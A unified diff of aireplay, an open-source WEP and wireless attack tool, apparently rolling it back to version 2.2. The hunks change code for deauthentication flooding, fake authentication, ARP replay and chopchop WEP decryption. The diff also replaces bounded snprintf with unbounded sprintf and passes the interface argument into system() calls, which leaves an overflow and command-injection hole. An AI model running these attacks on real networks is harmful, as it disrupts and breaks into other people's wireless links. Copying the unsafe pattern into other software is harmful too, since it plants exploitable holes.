@@ -73,6 +73,8 @@
 
 char usage[] =
 
+"\n"
+"  aireplay 2.2 - (C) 2004,2005 Christophe Devine\n"
 "\n"
 "  filter options:\n"
 "\n"
@@ -109,8 +111,6 @@ char usage[] =
 "      -3        : standard ARP-request replay\n"
 "      -4        : decrypt/chopchop WEP packet\n"
 "\n"
-"  aireplay %d.%d - (C) 2004,2005 Christophe Devine\n"
-"\n"
 "  usage: aireplay [options] <replay interface>\n"
 "\n";
 
@@ -132,7 +132,7 @@ struct options
     unsigned char r_bssid[6];
     unsigned char r_dmac[6];
     unsigned char r_smac[6];
-    char r_essid[33];
+    unsigned char r_essid[33];
 
     char *s_face;
     char *s_file;
@@ -169,7 +169,6 @@ unsigned long nb_pkt_sent;
 unsigned char h80211[4096];
 unsigned char tmpbuf[4096];
 unsigned char srcbuf[4096];
-char strbuf[512];
 
 int ctrl_c, alarmed;
 
@@ -385,8 +384,7 @@ int do_attack_deauth( void )
     }
 
     if( memcmp( opt.r_dmac, NULL_MAC, 6 ) == 0 )
-        printf( "This attack is more effective when targeting a\n"
-                "connected wireless client (-c <client's mac>).\n" );
+        printf( "Use -c to target a specific station.\n" );
 
     n = 0;
 
@@ -401,27 +399,15 @@ int do_attack_deauth( void )
         {
             /* deauthenticate the target */
 
+            memcpy( h80211 +  4, opt.r_dmac,  6 );
+
             PCT; printf( "Sending DeAuth to station   -- STMAC:"
                          " [%02X:%02X:%02X:%02X:%02X:%02X]\n",
                          opt.r_dmac[0],  opt.r_dmac[1],
                          opt.r_dmac[2],  opt.r_dmac[3],
                          opt.r_dmac[4],  opt.r_dmac[5] );
 
-            memcpy( h80211, DEAUTH_REQ, 26 );
-
-            memcpy( h80211 +  4, opt.r_dmac,  6 );
-            memcpy( h80211 + 10, opt.r_bssid, 6 );
-            memcpy( h80211 + 16, opt.r_bssid, 6 );
-
-            for( i = 0; i < 128; i++ )
-                if( send_packet( h80211, 26 ) < 0 )
-                    return( 1 );
-
-            memcpy( h80211 +  4, opt.r_bssid, 6 );
-            memcpy( h80211 + 10, opt.r_dmac,  6 );
-            memcpy( h80211 + 16, opt.r_bssid, 6 );
-
-            for( i = 0; i < 128; i++ )
+            for( i = 0; i < 256; i++ )
                 if( send_packet( h80211, 26 ) < 0 )
                     return( 1 );
         }
@@ -429,18 +415,18 @@ int do_attack_deauth( void )
         {
             /* deauthenticate all stations */
 
-            PCT; printf( "Sending DeAuth to broadcast -- BSSID:"
-                         " [%02X:%02X:%02X:%02X:%02X:%02X]\n",
-                         opt.r_bssid[0], opt.r_bssid[1],
-                         opt.r_bssid[2], opt.r_bssid[3],
-                         opt.r_bssid[4], opt.r_bssid[5] );
-
             memcpy( h80211, DEAUTH_REQ, 26 );
 
             memcpy( h80211 +  4, BROADCAST,   6 );
             memcpy( h80211 + 10, opt.r_bssid, 6 );
             memcpy( h80211 + 16, opt.r_bssid, 6 );
 
+            PCT; printf( "Sending DeAuth to broadcast -- BSSID:"
+                         " [%02X:%02X:%02X:%02X:%02X:%02X]\n",
+                         opt.r_bssid[0], opt.r_bssid[1],
+                         opt.r_bssid[2], opt.r_bssid[3],
+                         opt.r_bssid[4], opt.r_bssid[5] );
+
             for( i = 0; i < 256; i++ )
                 if( send_packet( h80211, 26 ) < 0 )
                     return( 1 );
@@ -525,22 +511,7 @@ int do_attack_fake_auth( void )
                 if( time( NULL ) - tt >= 2 )
                 {
                     if( x_send < 256 )
-                        x_send *= 2;
-                    else
-                    {
-                        printf(
-    "\nAttack was unsuccessful. Possible reasons:\n\n"
-    "    * Perhaps MAC address filtering is enabled.\n"
-    "    * Check that the BSSID (-a option) is correct.\n"
-    "    * The driver hasn't been patched for injection.\n"
-    "    * This attack sometimes fails against some APs.\n"
-    "    * The card is not on the same channel as the AP.\n"
-    "    * Injection is not supported AT ALL on HermesI,\n"
-    "      Centrino, ndiswrapper and a few others chipsets.\n"
-    "    * You're too far from the AP. Get closer, or lower\n"
-    "      the transmit rate (iwconfig <iface> rate 1M).\n\n" );
-                        return( 1 );
-                    }
+                        x_send *= 4;
 
                     state = 0;
                 }
@@ -550,7 +521,6 @@ int do_attack_fake_auth( void )
             case 2:
 
                 state = 3;
-                x_send *= 2;
                 tt = time( NULL );
 
                 /* attempt to associate */
@@ -761,7 +731,7 @@ int do_attack_fake_auth( void )
                         break;
 
                     case 12:
-                        printf( "Denied (code 12), wrong ESSID or WPA ?\n" );
+                        printf( "Denied (code 12), ESSID rejected ?\n" );
                         break;
 
                     default:
@@ -848,8 +818,6 @@ int capture_ask_packet( int *caplen )
         }
         else
         {
-            /* there are no hidden backdoors in this source code */
-
             n = sizeof( pkh );
 
             if( fread( &pkh, n, 1, dev.f_cap_in ) != 1 )
@@ -1002,15 +970,13 @@ int capture_ask_packet( int *caplen )
 
     lt = localtime( &tv.tv_sec );
 
-    memset( strbuf, 0, sizeof( strbuf ) );
-    snprintf( strbuf,  sizeof( strbuf ) - 1,
-              "replay_src-%02d%02d-%02d%02d%02d.cap",
-              lt->tm_mon + 1, lt->tm_mday,
-              lt->tm_hour, lt->tm_min, lt->tm_sec );
+    sprintf( tmpbuf, "replay_src-%02d%02d-%02d%02d%02d.cap",
+             lt->tm_mon + 1, lt->tm_mday,
+             lt->tm_hour, lt->tm_min, lt->tm_sec );
 
-    printf( "Saving chosen packet in %s\n", strbuf );
+    printf( "Saving chosen packet in %s\n", tmpbuf );
 
-    if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
+    if( ( f_cap_out = fopen( tmpbuf, "wb+" ) ) == NULL )
     {
         perror( "fopen failed" );
         return( 1 );
@@ -1231,15 +1197,13 @@ int do_attack_arp_resend( void )
 
     lt = localtime( &tv.tv_sec );
 
-    memset( strbuf, 0, sizeof( strbuf ) );
-    snprintf( strbuf,  sizeof( strbuf ) - 1,
-              "replay_arp-%02d%02d-%02d%02d%02d.cap",
-              lt->tm_mon + 1, lt->tm_mday,
-              lt->tm_hour, lt->tm_min, lt->tm_sec );
+    sprintf( tmpbuf, "replay_arp-%02d%02d-%02d%02d%02d.cap",
+             lt->tm_mon + 1, lt->tm_mday,
+             lt->tm_hour, lt->tm_min, lt->tm_sec );
 
-    printf( "Saving ARP requests in %s\n", strbuf );
+    printf( "Saving ARP requests in %s\n", tmpbuf );
 
-    if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
+    if( ( f_cap_out = fopen( tmpbuf, "wb+" ) ) == NULL )
     {
         perror( "fopen failed" );
         return( 1 );
@@ -1555,10 +1519,6 @@ int do_attack_chopchop( void )
     chopped[0] = 0x08;  /* normal data frame */
     chopped[1] = 0x41;  /* WEP = 1, ToDS = 1 */
 
-    /* copy the duration */
-
-    memcpy( chopped + 2, h80211 + 2, 2 );
-
     /* copy the BSSID */
 
     switch( h80211[1] & 3 )
@@ -1659,7 +1619,6 @@ int do_attack_chopchop( void )
             printf( "\n\n"
 "The chopchop attack appears to have failed. Possible reasons:\n"
 "\n"
-"    * You're trying to inject with an unsupported chipset (Centrino?).\n"
 "    * The driver source wasn't properly patched for injection support.\n"
 "    * You are too far from the AP. Get closer or reduce the send rate.\n"
 "    * Target is 802.11g only but you are using a Prism2 or RTL8180.\n"
@@ -1856,7 +1815,7 @@ int do_attack_chopchop( void )
             {
                 nb_bad_pkt++;
 
-                if( nb_bad_pkt > 256 )
+                if( nb_bad_pkt > 512 )
                 {
                     printf(
                 "\n\nFailure: got several deauthentication packets "
@@ -2007,15 +1966,13 @@ int do_attack_chopchop( void )
 
     lt = localtime( &tv.tv_sec );
 
-    memset( strbuf, 0, sizeof( strbuf ) );
-    snprintf( strbuf,  sizeof( strbuf ) - 1,
-              "replay_dec-%02d%02d-%02d%02d%02d.cap",
-              lt->tm_mon + 1, lt->tm_mday,
-              lt->tm_hour, lt->tm_min, lt->tm_sec );
+    sprintf( tmpbuf, "replay_dec-%02d%02d-%02d%02d%02d.cap",
+             lt->tm_mon + 1, lt->tm_mday,
+             lt->tm_hour, lt->tm_min, lt->tm_sec );
 
-    printf( "\nSaving plaintext in %s\n", strbuf );
+    printf( "\nSaving plaintext in %s\n", tmpbuf );
 
-    if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
+    if( ( f_cap_out = fopen( tmpbuf, "wb+" ) ) == NULL )
     {
         perror( "fopen failed" );
         return( 1 );
@@ -2049,15 +2006,13 @@ int do_attack_chopchop( void )
 
     /* save the RC4 stream (xor mask) */
 
-    memset( strbuf, 0, sizeof( strbuf ) );
-    snprintf( strbuf,  sizeof( strbuf ) - 1,
-              "replay_dec-%02d%02d-%02d%02d%02d.xor",
-              lt->tm_mon + 1, lt->tm_mday,
-              lt->tm_hour, lt->tm_min, lt->tm_sec );
+    sprintf( tmpbuf, "replay_dec-%02d%02d-%02d%02d%02d.xor",
+             lt->tm_mon + 1, lt->tm_mday,
+             lt->tm_hour, lt->tm_min, lt->tm_sec );
 
-    printf( "Saving keystream in %s\n", strbuf );
+    printf( "Saving keystream in %s\n", tmpbuf );
 
-    if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
+    if( ( f_cap_out = fopen( tmpbuf, "wb+" ) ) == NULL )
     {
         perror( "fopen failed" );
         return( 1 );
@@ -2184,18 +2139,10 @@ int getmac( char *s, unsigned char *mac )
     return( i != 6 );
 }
 
-char athXraw[] = "athXraw";
-
 int main( int argc, char *argv[] )
 {
     int n;
 
-    if( geteuid() != 0 )
-    {
-        printf( "This program requires root privileges.\n" );
-        return( 1 );
-    }
-
     /* check the arguments */
 
     memset( &opt, 0, sizeof( opt ) );
@@ -2362,8 +2309,7 @@ int main( int argc, char *argv[] )
 
             case 'e' :
 
-                memset(  opt.r_essid, 0, sizeof( opt.r_essid ) );
-                strncpy( opt.r_essid, optarg, sizeof( opt.r_essid ) - 1 );
+                strncpy( opt.r_essid, optarg, 32 );
                 break;
 
             case 'i' :
@@ -2457,7 +2403,7 @@ int main( int argc, char *argv[] )
     if( argc - optind < 1 || argc - optind > 2 )
     {
     usage:
-        printf( usage, _VER_MAJOR, _VER_MINOR );
+        printf( usage );
         return( 1 );
     }
 
@@ -2529,85 +2475,35 @@ int main( int argc, char *argv[] )
         return( 1 );
     }
 
-    /* check if wlan-ng or hostap or r8180 */
-
-    if( strlen( argv[optind] ) == 5 &&
-        memcmp( argv[optind], "wlan", 4 ) == 0 )
-    {
-        memset( strbuf, 0, sizeof( strbuf ) );
-        snprintf( strbuf,  sizeof( strbuf ) - 1,
-                  "wlancfg show %s 2>/dev/null | "
-                  "grep p2CnfWEPFlags >/dev/null",
-                  argv[optind] );
-
-        if( system( strbuf ) == 0 )
-            dev.is_wlanng = 1;
-
-        memset( strbuf, 0, sizeof( strbuf ) );
-        snprintf( strbuf,  sizeof( strbuf ) - 1,
-                  "iwpriv %s 2>/dev/null | "
-                  "grep antsel_rx >/dev/null",
-                  argv[optind] );
-
-        if( system( strbuf ) == 0 )
-            dev.is_hostap = 1;
-    }
-
-    /* enable injection on ralink */
-
-    if( strcmp( argv[optind], "ra0" ) == 0 ||
-        strcmp( argv[optind], "ra1" ) == 0 ||
-        strcmp( argv[optind], "rausb0" ) == 0 ||
-        strcmp( argv[optind], "rausb1" ) == 0 )
-    {
-        memset( strbuf, 0, sizeof( strbuf ) );
-        snprintf( strbuf,  sizeof( strbuf ) - 1,
-                  "iwpriv %s rfmontx 1 &>/dev/null",
-                  argv[optind] );
-        system( strbuf );
-    }
-
-    /* check if newer athXraw interface available */
-
-    if( strlen( argv[optind] ) == 4 &&
-        memcmp( argv[optind], "ath", 3 ) == 0 )
-    {
-        memset( strbuf, 0, sizeof( strbuf ) );
-        snprintf( strbuf,  sizeof( strbuf ) - 1,
-                  "sysctl -w dev.%s.rawdev=1 &>/dev/null",
-                  argv[optind] );
-
-        if( system( strbuf ) == 0 )
-        {
-            athXraw[3] = argv[optind][3];
-
-            memset( strbuf, 0, sizeof( strbuf ) );
-            snprintf( strbuf,  sizeof( strbuf ) - 1,
-                      "ifconfig %s up", athXraw );
-            system( strbuf );
-
-#if 0 /* some people reported problems when prismheader is enabled */
-            memset( strbuf, 0, sizeof( strbuf ) );
-            snprintf( strbuf,  sizeof( strbuf ) - 1,
-                     "sysctl -w dev.%s.rawdev_type=1 &>/dev/null",
-                     argv[optind] );
-            system( strbuf );
-#endif
-
-            argv[optind] = athXraw;
-        }
-    }
-
     /* drop privileges */
 
     setuid( getuid() );
 
+    /* check if wlan-ng or hostap or r8180 */
+
+    if( memcmp( argv[optind], "wlan", 4 ) == 0 )
+    {
+        sprintf( tmpbuf, "wlancfg show %s 2>/dev/null | "
+                         "grep p2CnfWEPFlags >/dev/null",
+                         argv[optind] );
+
+        if( system( tmpbuf ) == 0 )
+            dev.is_wlanng = 1;
+
+        sprintf( tmpbuf, "iwpriv %s 2>/dev/null | "
+                         "grep antsel_rx >/dev/null",
+                         argv[optind] );
+
+        if( system( tmpbuf ) == 0 )
+            dev.is_hostap = 1;
+    }
+
     if( opt.r_nbpps == 0 )
     {
         if( dev.is_wlanng || dev.is_hostap )
             opt.r_nbpps = 200;
         else
-            opt.r_nbpps = 500;
+            opt.r_nbpps = 600;
     }
 
     /* open the replay interface */
